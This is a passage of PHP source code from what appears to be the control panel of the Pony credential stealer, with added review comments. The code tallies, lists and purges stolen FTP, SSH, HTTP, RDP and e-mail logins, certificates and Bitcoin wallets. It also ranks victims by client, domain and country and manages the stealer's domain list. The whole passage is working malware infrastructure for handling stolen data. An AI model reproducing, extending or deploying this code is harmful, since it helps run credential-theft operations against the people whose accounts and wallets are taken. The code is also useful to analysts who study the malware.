  759. $offset_report_duplicates = $pony_db->get_multi_option('offset_report_duplicates', 2);
  760. $report_duplicates = $offset_report_duplicates[1] + $pony_db->get_duplicate_report_count($offset_report_duplicates[0]);
  761. $smarty->assign('report_duplicates', $report_duplicates);
  762. $pony_db->set_multi_option('offset_report_duplicates',
  763. array(
  764. $pony_db->get_auto_value(CPONY_LOG_TABLE),
  765. $report_duplicates,
  766. )
  767. );
  768.  
  769. $offset_nonparsed_reports = $pony_db->get_multi_option('offset_nonparsed_reports_stats', 2);
  770. $total_nonparsed_reports = $offset_nonparsed_reports[1] + $pony_db->get_table_row_count(CPONY_REPORT_TABLE, "WHERE report_id>='".mysql_real_escape_string($offset_nonparsed_reports[0])."' AND parsed='0'");
  771. $smarty->assign('total_nonparsed_reports', $total_nonparsed_reports);
  772. $pony_db->set_multi_option('offset_nonparsed_reports_stats',
  773. array(
  774. $pony_db->get_auto_value(CPONY_REPORT_TABLE),
  775. $total_nonparsed_reports,
  776. )
  777. );
  778.  
  779. $offset_nonparsed_reports_sum = $pony_db->get_multi_option('offset_nonparsed_reports_sum', 2);
  780. $total_nonparsed_reports_sum = $offset_nonparsed_reports_sum[1] + $pony_db->get_report_sum_linked("WHERE parsed='0'", $offset_nonparsed_reports_sum[0]);
  781. $smarty->assign('total_nonparsed_report_size', $total_nonparsed_reports_sum);
  782. $pony_db->set_multi_option('offset_nonparsed_reports_sum',
  783. array(
  784. $pony_db->get_auto_value(CPONY_REPORT_TABLE),
  785. $total_nonparsed_reports_sum,
  786. )
  787. );
  788.  
  789. $smarty->assign('total_nonparsed_report_size', $total_nonparsed_reports_sum);
  790. $smarty->assign('total_ftp_table_size', $pony_db->get_table_size(CPONY_FTP_TABLE));
  791. $smarty->assign('total_report_table_size', $pony_db->get_table_size(CPONY_REPORT_TABLE) + $pony_db->get_table_size(CPONY_REPORT_DATA_TABLE));
  792. $smarty->assign('total_log_table_size', $pony_db->get_table_size(CPONY_LOG_TABLE));
  793. $smarty->assign('total_cert_table_size', $pony_db->get_table_size(CPONY_CERT_TABLE));
  794. $smarty->assign('total_wallet_table_size', $pony_db->get_table_size(CPONY_WALLET_TABLE));
  795. $smarty->assign('total_email_table_size', $pony_db->get_table_size(CPONY_EMAIL_TABLE));
  796.  
  797. $offset_log_events_count = $pony_db->get_multi_option('offset_log_events_count', 2);
  798. $log_events_count = $offset_log_events_count[1] + $pony_db->get_table_row_count(CPONY_LOG_TABLE, "WHERE log_id>='".mysql_real_escape_string($offset_log_events_count[0])."' AND (log_source<>'".mysql_real_escape_string(CLOG_SOURCE_LOGIN)."')");
  799. $smarty->assign('log_events_count', $log_events_count);
  800. $pony_db->set_multi_option('offset_log_events_count',
  801. array(
  802. $pony_db->get_auto_value(CPONY_LOG_TABLE),
  803. $log_events_count,
  804. )
  805. );
  806.  
  807. $smarty->assign('server_time', mysql_now_date());
  808. $smarty->assign('db_size', $pony_db->get_db_size());
  809.  
  810. $offset_ftp = $pony_db->get_multi_option('offset_ftp_last', 3);
  811. list($offset_ftp[0], $new_ftp_last_24_hours) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_ftp[0]).'\' AND (url_type=\'ftp\' OR url_type=\'ssh\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 DAY)', 'ftp_id', CPONY_FTP_TABLE);
  812. list($offset_ftp[1], $new_ftp_last_hour) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_ftp[1]).'\' AND (url_type=\'ftp\' OR url_type=\'ssh\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 HOUR)', 'ftp_id', CPONY_FTP_TABLE);
  813. list($offset_ftp[2], $new_ftp_last_10_minutes) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_ftp[2]).'\' AND (url_type=\'ftp\' OR url_type=\'ssh\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 10 MINUTE)', 'ftp_id', CPONY_FTP_TABLE);
  814. $smarty->assign('new_ftp_last_24_hours', $new_ftp_last_24_hours);
  815. $smarty->assign('new_ftp_last_hour', $new_ftp_last_hour);
  816. $smarty->assign('new_ftp_last_10_minutes', $new_ftp_last_10_minutes);
  817.  
  818. $pony_db->set_multi_option('offset_ftp_last',
  819. array(
  820. $offset_ftp[0],
  821. $offset_ftp[1],
  822. $offset_ftp[2],
  823. )
  824. );
  825.  
  826. $offset_http = $pony_db->get_multi_option('offset_http_last', 3);
  827. list($offset_http[0], $new_http_last_24_hours) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_http[0]).'\' AND (url_type=\'http\' OR url_type=\'https\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 DAY)', 'ftp_id', CPONY_FTP_TABLE);
  828. list($offset_http[1], $new_http_last_hour) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_http[1]).'\' AND (url_type=\'http\' OR url_type=\'https\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 HOUR)', 'ftp_id', CPONY_FTP_TABLE);
  829. list($offset_http[2], $new_http_last_10_minutes) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_http[2]).'\' AND (url_type=\'http\' OR url_type=\'https\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 10 MINUTE)', 'ftp_id', CPONY_FTP_TABLE);
  830. $smarty->assign('new_http_last_24_hours', $new_http_last_24_hours);
  831. $smarty->assign('new_http_last_hour', $new_http_last_hour);
  832. $smarty->assign('new_http_last_10_minutes', $new_http_last_10_minutes);
  833.  
  834. $pony_db->set_multi_option('offset_http_last',
  835. array(
  836. $offset_http[0],
  837. $offset_http[1],
  838. $offset_http[2],
  839. )
  840. );
  841.  
  842. $offset_reports = $pony_db->get_multi_option('offset_reports_last', 3);
  843. list($offset_reports[0], $new_reports_last_24_hours) = $pony_db->get_offset_value_count('WHERE report_id>=\''.mysql_real_escape_string($offset_reports[0]).'\' AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 DAY)', 'report_id', CPONY_REPORT_TABLE);
  844. list($offset_reports[1], $new_reports_last_hour) = $pony_db->get_offset_value_count('WHERE report_id>=\''.mysql_real_escape_string($offset_reports[1]).'\' AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 HOUR)', 'report_id', CPONY_REPORT_TABLE);
  845. list($offset_reports[2], $new_reports_last_10_minutes) = $pony_db->get_offset_value_count('WHERE report_id>=\''.mysql_real_escape_string($offset_reports[2]).'\' AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 10 MINUTE)', 'report_id', CPONY_REPORT_TABLE);
  846. $smarty->assign('new_reports_last_24_hours', $new_reports_last_24_hours);
  847. $smarty->assign('new_reports_last_hour', $new_reports_last_hour);
  848. $smarty->assign('new_reports_last_10_minutes', $new_reports_last_10_minutes);
  849.  
  850. $pony_db->set_multi_option('offset_reports_last',
  851. array(
  852. $offset_reports[0],
  853. $offset_reports[1],
  854. $offset_reports[2],
  855. )
  856. );
  857.  
  858. $cert_last_import = $pony_db->get_last_cert_date();
  859. if ($cert_last_import !== false)
  860. {
  861. $smarty->assign('cert_last_import', $cert_last_import);
  862. }
  863.  
  864. $wallet_last_import = $pony_db->get_last_wallet_date();
  865. if ($wallet_last_import !== false)
  866. {
  867. $smarty->assign('wallet_last_import', $wallet_last_import);
  868. }
  869.  
  870. $pony_db->unlock_all_tables();
  871. }
  872.  
  873. // -------------------------------------------------------------------------------------------
  874. // Page processing code
  875. // -------------------------------------------------------------------------------------------
  876.  
  // Page handler for action=ftp: lists stored FTP/SSH credential records and
  // renders ftp_list.tpl. The two clear_* routines delete rows from
  // CPONY_FTP_TABLE by url_type and run only when priv_can_delete() allows it;
  // otherwise the ERR_NOT_ENOUGH_PRIVILEGES message is shown.
  877. if ($admin_action == 'ftp')
  878. {
  879. // ---------------------------------------------------------------------------------------
  880. // FTP list
  881.  
  882. if ($admin_routine == 'clear_ftp')
  883. {
  884. if ($pony_db->priv_can_delete())
  885. {
  886. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE url_type='ftp'");
  // clear_floating_offsets() is defined outside this view; presumably it resets
  // the saved offset_* options after rows are removed - confirm against its definition.
  887. clear_floating_offsets($pony_db);
  888. }
  889. else
  890. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  891. }
  892. elseif ($admin_routine == 'clear_ssh')
  893. {
  894. if ($pony_db->priv_can_delete())
  895. {
  896. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE url_type='ssh'");
  897. clear_floating_offsets($pony_db);
  898. }
  899. else
  900. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  901. }
  902.  
  // Load the list starting from the offset saved in the 'offset_ftp_list' option.
  // The literal 10 is presumably the maximum number of rows - get_ftp_list() is not shown here.
  903. $offset_ftp_list = $pony_db->get_multi_option('offset_ftp_list', 1);
  904. $ftp_list = array();
  905. $pony_db->get_ftp_list(false, $ftp_list, 10, 'both', $offset_ftp_list[0]);
  906.  
  // For each row: keep the raw module identifier under 'module', replace
  // 'ftp_client' with the name returned by module_name_to_client_name(), and
  // blank the report link when the referenced report no longer exists.
  907. foreach ($ftp_list as $ftp_item=>$ftp_value)
  908. {
  909. $ftp_list[$ftp_item]['module'] = $ftp_list[$ftp_item]['ftp_client'];
  910. $ftp_list[$ftp_item]['ftp_client'] = module_name_to_client_name($ftp_list[$ftp_item]['ftp_client']);
  911. if (!$pony_db->report_id_exists($ftp_list[$ftp_item]['report_id']))
  912. {
  913. $ftp_list[$ftp_item]['report_id'] = '';
  914. }
  915. }
  916.  
  // The ftp_id of the last list element (0 for an empty list) is written back
  // to 'offset_ftp_list' and read again as the offset on the next page view.
  917. if (count($ftp_list))
  918. {
  919. $first_id = $ftp_list[count($ftp_list)-1]['ftp_id'];
  920. } else
  921. {
  922. $first_id = 0;
  923. }
  924.  
  925. $pony_db->set_multi_option('offset_ftp_list', array($first_id));
  926.  
  927. apply_data_filters($smarty, false);
  928. smarty_assign_continents($smarty);
  929.  
  930. smarty_assign_common_vars($smarty, $pony_db);
  931. $smarty->assign('ftp_list', $ftp_list);
  932. $smarty->display('ftp_list.tpl');
  933. }
  // Page handler for action=http: lists stored HTTP/HTTPS credential records and
  // renders http_list.tpl. This `if` starts a new if / else-if chain; the
  // preceding 'ftp' branch is a separate statement. HTTP(S) rows live in
  // CPONY_FTP_TABLE alongside FTP/SSH rows and are distinguished by url_type.
  // NOTE(review): no $enable_http_mode / $show_http_to_users check is visible in
  // this branch; it may be enforced elsewhere in the file - confirm.
  934. if ($admin_action == 'http')
  935. {
  936. // ---------------------------------------------------------------------------------------
  937. // HTTP list
  938.  
  939. smarty_assign_continents($smarty);
  940.  
  // clear_http deletes every http/https row, only when priv_can_delete() allows it.
  941. if ($admin_routine == 'clear_http')
  942. {
  943. if ($pony_db->priv_can_delete())
  944. {
  945. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE (url_type='http') OR (url_type='https')");
  946. clear_floating_offsets($pony_db);
  947. }
  948. else
  949. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  950. }
  951.  
  // Load the list starting from the offset saved in the 'offset_http_list' option.
  952. $offset_http_list = $pony_db->get_multi_option('offset_http_list', 1);
  953. $http_list = array();
  954. $pony_db->get_http_list(false, $http_list, 10, 'both', $offset_http_list[0]);
  955.  
  // Same row post-processing as the FTP list: raw module id kept under 'module',
  // display name written to 'ftp_client', dangling report links blanked.
  956. foreach ($http_list as $http_item=>$http_value)
  957. {
  958. $http_list[$http_item]['module'] = $http_list[$http_item]['ftp_client'];
  959. $http_list[$http_item]['ftp_client'] = module_name_to_client_name($http_list[$http_item]['ftp_client']);
  960. if (!$pony_db->report_id_exists($http_list[$http_item]['report_id']))
  961. {
  962. $http_list[$http_item]['report_id'] = '';
  963. }
  964. }
  965.  
  // The ftp_id of the last list element (0 for an empty list) becomes the saved offset.
  966. if (count($http_list))
  967. {
  968. $first_id = $http_list[count($http_list)-1]['ftp_id'];
  969. } else
  970. {
  971. $first_id = 0;
  972. }
  973.  
  974. $pony_db->set_multi_option('offset_http_list', array($first_id));
  975.  
  976. apply_data_filters($smarty, false, 'http');
  // Second call to smarty_assign_continents() in this branch (the first is at the top).
  977. smarty_assign_continents($smarty);
  978.  
  979. smarty_assign_common_vars($smarty, $pony_db);
  980. $smarty->assign('http_list', $http_list);
  981. $smarty->display('http_list.tpl');
  982. }
  // Page handler for action=other: maintenance routines for the certificate,
  // wallet, RDP and e-mail data sets, followed by the e-mail list shown in
  // other.tpl. Every clear_* routine is gated by priv_can_delete().
  983. else if ($admin_action == 'other')
  984. {
  985. // ---------------------------------------------------------------------------------------
  986. // Other
  987. if ($admin_routine == 'clear_cert')
  988. {
  989. if ($pony_db->priv_can_delete())
  990. {
  991. $pony_db->clear_table(CPONY_CERT_TABLE);
  992. show_smarty_success($smarty);
  993. }
  994. else
  995. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  996. } else if ($admin_routine == 'clear_wallet')
  997. {
  998. if ($pony_db->priv_can_delete())
  999. {
  1000. $pony_db->clear_table(CPONY_WALLET_TABLE);
  1001. show_smarty_success($smarty);
  1002. }
  1003. else
  1004. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1005. } else if ($admin_routine == 'clear_rdp')
  1006. {
  1007. if ($pony_db->priv_can_delete())
  1008. {
  // RDP rows are stored in CPONY_FTP_TABLE with url_type='rdp'.
  1009. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE (url_type='rdp')");
  1010. clear_floating_offsets($pony_db);
  1011. show_smarty_success($smarty);
  1012. }
  1013. else
  1014. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1015. } else if ($admin_routine == 'clear_email')
  1016. {
  1017. if ($pony_db->priv_can_delete())
  1018. {
  1019. $pony_db->clear_table(CPONY_EMAIL_TABLE);
  1020. clear_floating_offsets($pony_db);
  1021. show_smarty_success($smarty);
  1022. }
  1023. else
  1024. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1025. }
  1026.  
  // Load the e-mail list starting from the offset saved in 'offset_email_list'.
  1027. $offset_email_list = $pony_db->get_multi_option('offset_email_list', 1);
  1028. $email_list = array();
  1029. $pony_db->get_email_list(false, $email_list, 10, '', $offset_email_list[0]);
  1030.  
  // Keep the raw module id under 'module'; 'email_client' gets the display name.
  1031. foreach ($email_list as $email_item=>$email_value)
  1032. {
  1033. $email_list[$email_item]['module'] = $email_list[$email_item]['email_client'];
  1034. $email_list[$email_item]['email_client'] = module_name_to_client_name($email_list[$email_item]['email_client']);
  1035. }
  1036.  
  // The email_id of the last list element (0 for an empty list) becomes the saved offset.
  1037. if (count($email_list))
  1038. {
  1039. $first_id = $email_list[count($email_list)-1]['email_id'];
  1040. } else
  1041. {
  1042. $first_id = 0;
  1043. }
  1044.  
  1045. $pony_db->set_multi_option('offset_email_list', array($first_id));
  1046. $smarty->assign('email_list', $email_list);
  1047.  
  1048. smarty_assign_common_vars($smarty, $pony_db);
  1049. $smarty->display("other.tpl");
  1050. }
  // Page handler for action=stats: builds per-client, per-domain and per-country
  // summary tables from the stored data and renders stats.tpl. Each section
  // follows the same pattern: fetch a name=>count map, sum the counts, then emit
  // one row per entry with its share formatted as a two-decimal percentage.
  1051. else if ($admin_action == 'stats')
  1052. {
  1053. // ---------------------------------------------------------------------------------------
  1054. // Statistics
  1055.  
  1056. // FTP clients statistics
  1057. $ftp_list = array();
  1058. $ftp_clients_list = array();
  1059. if ($pony_db->get_ftp_clients_stats($ftp_list) && count($ftp_list) > 0)
  1060. {
  1061. /*
  1062. // Show all FTP clients, even with 0 passwords grabbed
  1063. foreach ($global_module_list as $module_list_item)
  1064. {
  1065. // skip system info module
  1066. if ($module_list_item[0] == $global_module_list[0][0])
  1067. continue;
  1068. if (array_key_exists($module_list_item[0], $ftp_list) === false)
  1069. {
  1070. $ftp_list[$module_list_item[0]] = '0';
  1071. }
  1072. }*/
  1073.  
  1074. $sum = 0;
  1075.  
  1076. foreach ($ftp_list as $count)
  1077. $sum += intval($count);
  1078.  
  1079. foreach ($ftp_list as $ftp_client=>$count)
  1080. {
  1081. array_push($ftp_clients_list, array(
  1082. 'module'=>$ftp_client,
  1083. 'name'=>module_name_to_client_name($ftp_client),
  1084. 'count'=>$count,
  1085. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
  1086. ));
  1087. }
  1088. }
  1089.  
  1090. // HTTP clients statistics
  1091. $http_list = array();
  1092. $http_clients_list = array();
  1093. if ($pony_db->get_http_clients_stats($http_list) && count($http_list) > 0)
  1094. {
  1095. $sum = 0;
  1096.  
  1097. foreach ($http_list as $count)
  1098. $sum += intval($count);
  1099.  
  1100. foreach ($http_list as $http_client=>$count)
  1101. {
  1102. array_push($http_clients_list, array(
  1103. 'module'=>$http_client,
  1104. 'name'=>module_name_to_client_name($http_client),
  1105. 'count'=>$count,
  1106. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
  1107. ));
  1108. }
  1109. }
  1110.  
  1111. // E-mail clients statistics
  1112. $email_list = array();
  1113. $email_clients_list = array();
  1114. if ($pony_db->get_email_clients_stats($email_list) && count($email_list) > 0)
  1115. {
  1116. $sum = 0;
  1117.  
  1118. foreach ($email_list as $count)
  1119. $sum += intval($count);
  1120.  
  1121. foreach ($email_list as $email_client=>$count)
  1122. {
  1123. array_push($email_clients_list, array(
  1124. 'module'=>$email_client,
  1125. 'name'=>module_name_to_client_name($email_client),
  1126. 'count'=>$count,
  1127. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
  1128. ));
  1129. }
  1130. }
  1131.  
  1132. // HTTP domains statistics
  1133. $http_domain_list = array();
  1134. $http_domain_stats = array();
  1135. if ($pony_db->get_http_domain_stats($http_domain_list) && count($http_domain_list))
  1136. {
  1137. $sum = 0;
  1138.  
  1139. foreach ($http_domain_list as $count)
  1140. $sum += intval($count);
  1141.  
  1142. foreach ($http_domain_list as $domain=>$count)
  1143. {
  1144. array_push($http_domain_stats, array(
  1145. 'domain'=>$domain,
  1146. 'count'=>$count,
  1147. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
  1148. ));
  1149. }
  1150. }
  1151.  
  1152. // Bitcoin clients statistics
  1153. $bitcoin_list = array();
  1154. $bitcoin_clients_list = array();
  1155. if ($pony_db->get_bitcoin_clients_stats($bitcoin_list) && count($bitcoin_list) > 0)
  1156. {
  1157. $sum = 0;
  1158.  
  1159. foreach ($bitcoin_list as $count)
  1160. $sum += intval($count);
  1161.  
  1162. foreach ($bitcoin_list as $bitcoin_client=>$count)
  1163. {
  1164. array_push($bitcoin_clients_list, array(
  1165. 'module'=>$bitcoin_client,
  1166. 'name'=>module_name_to_client_name($bitcoin_client),
  1167. 'count'=>$count,
  1168. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
  1169. ));
  1170. }
  1171. }
  1172.  
  1173. // Country statistics
  // $country_list is keyed by country code and carries 'report_count'; the
  // per-country 'ftp_count' is built below as a running total of FTP/HTTP,
  // e-mail, certificate and wallet counts, not FTP rows alone.
  1174. $country_list = array();
  1175. $smarty_country_list = array();
  1176. if ($pony_db->get_country_stats($country_list) && count($country_list) > 0)
  1177. {
  1178. // FTP/HTTP stats
  // HTTP(S) rows are included only when HTTP mode is enabled and the viewer is
  // either an admin or HTTP data is configured as visible to ordinary users.
  1179. if ($enable_http_mode && ($show_http_to_users || $pony_db->priv_is_admin()))
  1180. $pony_db->get_all_country_stats($country_ftp_list); // ftp/ssh/rdp/http/https/...
  1181. else
  1182. $pony_db->get_ftp_country_stats($country_ftp_list); // ftp/ssh only
  1183.  
  1184. if (is_array($country_ftp_list))
  1185. {
  1186. foreach ($country_list as $country_name=>$country_value)
  1187. {
  1188. if (isset($country_ftp_list[$country_name]['ftp_count']))
  1189. $country_list[$country_name]['ftp_count'] = $country_ftp_list[$country_name]['ftp_count'];
  1190. else
  1191. $country_list[$country_name]['ftp_count'] = 0;
  1192. }
  1193.  
  1194. }
  1195.  
  1196. // E-mail stats
  1197. if ($enable_email_mode && ($show_email_to_users || $pony_db->priv_is_admin()))
  1198. {
  1199. $pony_db->get_email_country_stats($country_email_list);
  1200. if (is_array($country_email_list))
  1201. {
  1202. foreach ($country_list as $country_name=>$country_value)
  1203. {
  1204. if (isset($country_email_list[$country_name]['email_count']))
  1205. {
  1206. if (!isset($country_list[$country_name]['ftp_count']))
  1207. $country_list[$country_name]['ftp_count'] = 0;
  1208. $country_list[$country_name]['ftp_count'] += $country_email_list[$country_name]['email_count'];
  1209. }
  1210. }
  1211.  
  1212. }
  1213. }
  1214.  
  1215. // Certificates
  1216. $pony_db->get_cert_country_stats($country_cert_list);
  1217. if (is_array($country_cert_list))
  1218. {
  1219. foreach ($country_list as $country_name=>$country_value)
  1220. {
  1221. if (isset($country_cert_list[$country_name]['cert_count']))
  1222. {
  1223. if (!isset($country_list[$country_name]['ftp_count']))
  1224. $country_list[$country_name]['ftp_count'] = 0;
  1225. $country_list[$country_name]['ftp_count'] += $country_cert_list[$country_name]['cert_count'];
  1226. }
  1227. }
  1228. }
  1229.  
  1230. // Wallets
  1231. $pony_db->get_wallet_country_stats($country_wallet_list);
  1232. if (is_array($country_wallet_list))
  1233. {
  1234. foreach ($country_list as $country_name=>$country_value)
  1235. {
  1236. if (isset($country_wallet_list[$country_name]['wallet_count']))
  1237. {
  1238. if (!isset($country_list[$country_name]['ftp_count']))
  1239. $country_list[$country_name]['ftp_count'] = 0;
  1240. $country_list[$country_name]['ftp_count'] += $country_wallet_list[$country_name]['wallet_count'];
  1241. }
  1242. }
  1243. }
  1244.  
  // Totals across all countries, used as denominators for the percentages below.
  1245. $report_sum = 0;
  1246. $ftp_sum = 0;
  1247.  
  1248. foreach ($country_list as $count_array)
  1249. $report_sum += intval($count_array['report_count']);
  1250. foreach ($country_list as $count_array)
  1251. if (isset($count_array['ftp_count']))
  1252. $ftp_sum += intval($count_array['ftp_count']);
  1253.  
  // One output row per country code; a percentage is left as '' when its total is 0.
  // assign() is defined outside this view; presumably it returns its argument or
  // an empty value when the key is unset - confirm against its definition.
  1254. $geo_ip = new GeoIP();
  1255. foreach ($country_list as $country_code=>$count_array)
  1256. {
  1257. if ($report_sum != 0)
  1258. $report_percentage = sprintf("%01.2f", $count_array['report_count']/$report_sum*100);
  1259. else
  1260. $report_percentage = '';
  1261.  
  1262. if ($ftp_sum != 0)
  1263. $ftp_percentage = sprintf("%01.2f", intval(assign($count_array['ftp_count']))/$ftp_sum*100);
  1264. else
  1265. $ftp_percentage = '';
  1266.  
  1267. $country = '';
  1268. $flag_url = '';
  1269. $country_name = geoip_country_code_to_country_name($geo_ip, $country_code);
  1270.  
  1271. array_push($smarty_country_list, array("country_name"=>$country_name,
  1272. "country_code"=>$country_code,
  1273. "ftp_count"=>intval(assign($count_array['ftp_count'])), "report_count"=>$count_array['report_count'],
  1274. "report_percentage"=>$report_percentage,
  1275. "ftp_percentage"=>$ftp_percentage));
  1276. }
  1277. }
  1278.  
  1279. $smarty->assign('http_clients_list', $http_clients_list);
  1280. $smarty->assign('bitcoin_clients_list', $bitcoin_clients_list);
  1281. $smarty->assign('ftp_clients_list', $ftp_clients_list);
  1282. $smarty->assign('email_clients_list', $email_clients_list);
  1283. $smarty->assign('country_list', $smarty_country_list);
  1284. $smarty->assign('http_domain_list', $http_domain_stats);
  1285. $smarty->display('stats.tpl');
  1286. }
  // Page handler for action=ping: maintains the stored domain list and renders
  // domains.tpl. The whole page is refused unless $show_domains is set and the
  // account passes priv_can_delete(). $show_domains is defined outside this view.
  1287. else if ($admin_action == 'ping')
  1288. {
  1289. // ---------------------------------------------------------------------------------------
  1290. // Domain management
  1291. if (!$show_domains || !$pony_db->priv_can_delete())
  1292. {
  1293. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1294. } else
  1295. {
  // Request parameters read here: 'domain' for routine=add, 'domain_id' for
  // routine=delete. A value that is exactly 'http://' after trimming is not added.
  1296. if ($admin_routine == 'add')
  1297. {
  1298. if (trim(assign($_REQUEST['domain'])) != 'http://')
  1299. $pony_db->add_domain(trim(assign($_REQUEST['domain'])));
  1300. } else if ($admin_routine == 'delete' && nonempty($_REQUEST['domain_id']))
  1301. {
  1302. $pony_db->delete_domain(trim(assign($_REQUEST['domain_id'])));
  1303. }
  1304.  
  1305. $domain_list = array();
  1306. $pony_db->get_domains($domain_list);
  1307.  
  1308. $smarty->assign("domain_list", $domain_list);
  1309. $smarty->display('domains.tpl');
  1310. }
  1311. }
  // Page handler for action=log: paginated, filterable view of the event log,
  // rendered with log_list.tpl. routine=clear_log deletes log items when
  // priv_can_delete() allows it.
  1312. else if ($admin_action == 'log')
  1313. {
  1314. // ---------------------------------------------------------------------------------------
  1315. // Logs
  1316. if ($admin_routine == 'clear_log')
  1317. {
  1318. if ($pony_db->priv_can_delete())
  1319. {
  1320. $pony_db->delete_log_items(CPONY_LOG_TABLE);
  1321. clear_floating_offsets($pony_db);
  1322. }
  1323. else
  1324. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1325. }
  1326.  
  // Request parameters read here: filter_ip, filter_hwid, filter_notify, next.
  // 'next' is converted to an integer and decremented when positive before being
  // passed to the list query (presumably 1-based page input to 0-based offset - confirm).
  1327. $filter_ip = trim(assign($_REQUEST['filter_ip']));
  1328. $filter_hwid = trim(assign($_REQUEST['filter_hwid']));
  1329. $filter_notify = trim(assign($_REQUEST['filter_notify']));
  1330. $next = trim(assign($_REQUEST['next']));
  1331. if (strlen($next) == 0)
  1332. $next = '0';
  1333. $next = intval($next);
  1334. if ($next > 0)
  1335. $next--;
  1336.  
  1337. $max_results = 25; // log lines per page
  1338.  
  1339. $total_items_count = $pony_db->get_log_row_count_filter($filter_ip, $filter_hwid, $filter_notify);
  1340.  
  1341. $log_list = array();
  1342.  
  1343. $pony_db->get_log_list_report_filter($log_list, $next, $max_results, false, $filter_ip, $filter_hwid, $filter_notify);
  1344.  
  // Active filters are appended to the pagination URL. The values are passed
  // through htmlspecialchars() with the cp1251 charset; no URL-encoding call is
  // visible on this path.
  1345. $filter = '';
  1346. if (strlen($filter_ip))
  1347. $filter .= '&filter_ip='.htmlspecialchars($filter_ip, ENT_QUOTES, 'cp1251');
  1348. if (strlen($filter_hwid))
  1349. $filter .= '&filter_hwid='.htmlspecialchars($filter_hwid, ENT_QUOTES, 'cp1251');
  1350. if (strlen($filter_notify))
  1351. $filter .= '&filter_notify='.htmlspecialchars($filter_notify, ENT_QUOTES, 'cp1251');
  1352.  
  // Pagination links take the form <self_file>?token=<token>&action=log plus the
  // filter string; 25 rows per page, page limit 50.
  1353. SmartyPaginate::disconnect();
  1354. SmartyPaginate::connect();
  1355. SmartyPaginate::setLimit($max_results);
  1356. SmartyPaginate::setPageLimit(50);
  1357. SmartyPaginate::setURL($self_file."?token=".$token."&action=log".$filter);
  1358. SmartyPaginate::setTotal($total_items_count);
  1359. SmartyPaginate::setPrevText($lang['Previous']);
  1360. SmartyPaginate::setNextText($lang['Next']);
  1361. SmartyPaginate::assign($smarty);
  1362.  
  1363. smarty_assign_common_vars($smarty, $pony_db);
  1364. $smarty->assign("log_list", $log_list);
  1365. $smarty->display('log_list.tpl');
  1366. }
  // Page handler for action=reports. Three paths are visible:
  //   - clear_reports / delete: remove all reports or a single report, gated by
  //     priv_can_delete();
  //   - view_report / reparse / confirm_delete: show one stored report and a
  //     parser debug trace, with reparse also writing the parse result back;
  //   - any other routine: the paginated, filterable report list.
  1367. else if ($admin_action == 'reports')
  1368. {
  1369. // ---------------------------------------------------------------------------------------
  1370. // Reports
  1371. if ($admin_routine == 'clear_reports')
  1372. {
  1373. if ($pony_db->priv_can_delete())
  1374. {
  1375. $pony_db->clear_table(CPONY_REPORT_TABLE);
  1376. $pony_db->clear_table(CPONY_REPORT_DATA_TABLE);
  1377. clear_floating_offsets($pony_db);
  1378. } else
  1379. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1380. }
  1381. if ($admin_routine == 'delete')
  1382. {
  1383. if ($pony_db->priv_can_delete())
  1384. {
  1385. $report_id = trim(assign($_REQUEST['report_id']));
  1386. $pony_db->report_remove_errors($report_id);
  1387. $pony_db->report_remove($report_id);
  1388. clear_floating_offsets($pony_db);
  1389. } else
  1390. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1391. }
  1392. elseif ($admin_routine == 'view_report' || $admin_routine == 'reparse' || $admin_routine == 'confirm_delete')
  1393. {
  1394. // View detailed report information
  // Request parameters read here: log_id, report_id. report_id is escaped with
  // mysql_real_escape_string() before being placed in the WHERE clause.
  // NOTE(review): unlike the clear/delete routines, no priv_* check is visible
  // on this path, including the reparse write-back below - confirm whether one
  // is applied elsewhere.
  1395. $log_id = trim(assign($_REQUEST['log_id']));
  1396. $report_id = trim(assign($_REQUEST['report_id']));
  1397.  
  1398. $report_size = $pony_db->get_report_sum_linked("WHERE report_id='".mysql_real_escape_string($report_id)."'");
  1399.  
  1400. $smarty->assign('report_id', $report_id);
  1401. $smarty->assign('report_size', $report_size);
  1402. $smarty->assign('log_id', $log_id);
  1403.  
